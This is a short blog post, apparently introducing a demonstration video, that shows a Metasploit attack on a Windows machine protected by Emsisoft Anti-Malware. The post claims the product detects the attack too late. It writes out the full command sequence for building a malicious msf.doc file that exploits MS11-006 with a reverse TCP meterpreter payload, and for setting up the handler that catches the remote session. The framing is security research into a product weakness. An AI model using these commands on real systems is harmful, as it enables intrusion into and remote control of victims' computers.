Tag Archives: Emsisoft

?Metasploit Meterpreter race condition against Emsisoft Anti-Malware?

This video will demonstrate you a race condition against Emsisoft Anti-Malware product. This race condition is due to design errors in Emsisoft Anti-Malware product.

We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.

As you will see, the installed “Emsisoft Anti-Malware” product will detect the attack, but to late. The meterpreter sessions is created and you have access to the system. The demonstrated product is an update-to-date Emsisoft Anti-Malware (Version : 5.1.0.10 – Signatures : 5,466,115).

Metasploit commands :

To create the msf.doc file to exploit MS11-06 vulnerability

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

To listen for incoming meterpreter sessions

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j

Demonstration video :